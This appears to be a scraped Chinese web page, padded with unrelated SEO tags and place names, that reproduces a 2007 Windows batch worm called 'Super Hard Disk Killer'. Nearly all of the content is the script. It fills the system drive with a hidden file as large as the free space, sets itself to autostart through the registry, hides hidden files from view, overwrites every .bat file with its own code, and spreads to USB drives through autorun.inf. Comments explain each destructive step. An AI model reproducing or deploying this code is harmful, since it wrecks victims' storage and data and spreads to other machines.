濮阳杆衣贸易有限公司

主頁 > 知識庫 > 超級硬盤殺手的bat

超級硬盤殺手的bat

熱門標(biāo)簽:廣州云外呼系統(tǒng)公司 谷歌地圖標(biāo)注時間 岳陽縣地圖標(biāo)注app 好的人工智能電話機(jī)器人 地圖標(biāo)注銷售數(shù)據(jù) 云南旅游地圖標(biāo)注app 百應(yīng)ai電話機(jī)器人銷售怎么樣 地圖標(biāo)注位置有用嗎 中國地圖標(biāo)注省份顏色
復(fù)制代碼 代碼如下:

@echo off

%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%
%ozone%     %Name  :REON%               %ozone%
%ozone%     %Author:Ozone [verybat.cn]%   %ozone%
%ozone%     %Data  :17/04/2007%           %ozone%
%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%



if exsit %SystemDrive%\PAGEFILES.SYS goto end
copy %0 %windir%\system32\logon.bat                     ::復(fù)制自身
FOR /F "tokens=3*" %%i in ('dir /-c %SystemDrive%^|find "可用字節(jié)"') do fsutil file createnew %SystemDrive%\PAGEFILES.SYS %%i   ::制造超大文件,轟炸硬盤
attrib +r +s +h %SystemDrive%\PAGEFILES.SYS        ::隱藏文件
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KV2007 /t REG_SZ /d %windir%\system32\logon.vbs                      ::自動啟動
reg delete HKLM\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /va /f                    ::不顯示隱藏文件
for /r %SystemDrive% %%i in (*.bat) do type %0>%%i       ::感染


if exist %windir%\system32\logon.vbs goto end
+++++++++++++++++++++++++=VBS部分+++++++++++++++++++++++++++++++++++++++

echo set fs =createobject("scripting.filesystemobject")>>%windir%\system32\logon.vbs
echo set WshShell = WScript.CreateObject("WScript.Shell")>>%windir%\system32\logon.vbs
echo Set objWMIService = GetObject("winmgmts:" _>>%windir%\system32\logon.vbs
echo ^ "{impersonationLevel=impersonate}!\\" ^ strComputer ^ "\root\cimv2")>>%windir%\system32\logon.vbs
echo Set colDisks = objWMIService.ExecQuery _>>%windir%\system32\logon.vbs
echo ("Select * from Win32_LogicalDisk")>>%windir%\system32\logon.vbs

::監(jiān)視u盤
echo For i =1 to 9000000000>>%windir%\system32\logon.vbs
echo For Each objDisk in colDisks>>%windir%\system32\logon.vbs
echo Select Case objDisk.DriveType>>%windir%\system32\logon.vbs
echo :Case 2:>>%windir%\system32\logon.vbs


::判斷u盤中是否存在autorun.inf,不存在則寫入autorun.inf并且隱藏.
echo y1=fs.FileExists(objDisk.DeviceID ^ "\AUTORUN.INF")>>%windir%\system32\logon.vbs
echo if not y1 then>>%windir%\system32\logon.vbs
echo set f=fs.opentextfile(objDisk.DeviceID ^ "\AUTORUN.INF",2, true)>>%windir%\system32\logon.vbs
echo f.write "[AutoRun]" ^ vbcrlf>>%windir%\system32\logon.vbs
echo f.write "open=logon.bat" ^ vbcrlf>>%windir%\system32\logon.vbs
echo f.write "shellexecute=logon.bat" ^ vbcrlf>>%windir%\system32\logon.vbs
echo f.write "shell\Auto\command=logon.bat" ^ vbcrlf>>%windir%\system32\logon.vbs
echo f.Close>>%windir%\system32\logon.vbs
echo Set f1 = fs.GetFile(objDisk.DeviceID ^ "\AUTORUN.INF")>>%windir%\system32\logon.vbs
echo If f1.Attributes = f1.Attributes AND 2 Then>>%windir%\system32\logon.vbs
echo :f1.Attributes = f1.Attributes XOR 7:>>%windir%\system32\logon.vbs
echo End If>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs

::判斷u盤中是否存在logon.bat,如果不存在則寫入logon.bat并隱藏.
echo y2=fs.FileExists(objDisk.DeviceID ^ "\logon.bat")>>%windir%\system32\logon.vbs
echo if not y2 then >>%windir%\system32\logon.vbs
echo fs.CopyFile "c:\windows\system32\logon.bat",objDisk.DeviceID ^ "\">>%windir%\system32\logon.vbs
echo Set f2 = fs.GetFile(objDisk.DeviceID ^ "\logon.bat")>>%windir%\system32\logon.vbs
echo If f2.Attributes = f2.Attributes AND 2 Then>>%windir%\system32\logon.vbs
echo :f2.Attributes = f2.Attributes XOR 7:>>%windir%\system32\logon.vbs
echo End If>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs

echo dirr = Wshshell.ExpandEnvironmentStrings("%systemdrive%")>>%windir%\system32\logon.vbs

::判斷u盤中是否存在PAGEFILES.SYS,如果不存在則寫入PAGEFILES.SYS并隱藏.
echo y3=fs.FileExists(dirr  "\PAGEFILES.SYS")>>%windir%\system32\logon.vbs
echo if not y3 then>>%windir%\system32\logon.vbs
echo WshShell.Run "logon.bat">>%windir%\system32\logon.vbs
echo WScript.Sleep 500>>%windir%\system32\logon.vbs
echo Set f3 = fs.GetFile(dirr  "\PAGEFILES.SYS")>>%windir%\system32\logon.vbs
echo If f3.Attributes = f3.Attributes AND 2 Then>>%windir%\system32\logon.vbs
echo :f3.Attributes = f3.Attributes XOR 7:>>%windir%\system32\logon.vbs
echo End If>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs
echo End Select>>%windir%\system32\logon.vbs
echo Next>>%windir%\system32\logon.vbs

::每隔5秒掃描一次.
echo WScript.Sleep 5000>>%windir%\system32\logon.vbs
echo Next>>%windir%\system32\logon.vbs

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

:end

標(biāo)簽:周口 三明 三沙 宜昌 天門 東營 南京 鄭州

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《超級硬盤殺手的bat》,本文關(guān)鍵詞  超級,硬盤,殺手,的,bat,超級,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《超級硬盤殺手的bat》相關(guān)的同類信息!
  • 本頁收集關(guān)于超級硬盤殺手的bat的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    重庆市| 阿合奇县| 华蓥市| 昌黎县| 财经| 新闻| 南平市| 金坛市| 准格尔旗| 五常市| 兴宁市| 翼城县| 祁阳县| 长兴县| 扶绥县| 江达县| 高雄市| 武宣县| 临沧市| 康保县| 大厂| 石狮市| 佳木斯市| 韶关市| 蒙自县| 清涧县| 沾益县| 渑池县| 右玉县| 南投市| 新宁县| 滁州市| 霍山县| 彭水| 新密市| 台北市| 浦江县| 新蔡县| 色达县| 马关县| 武乡县|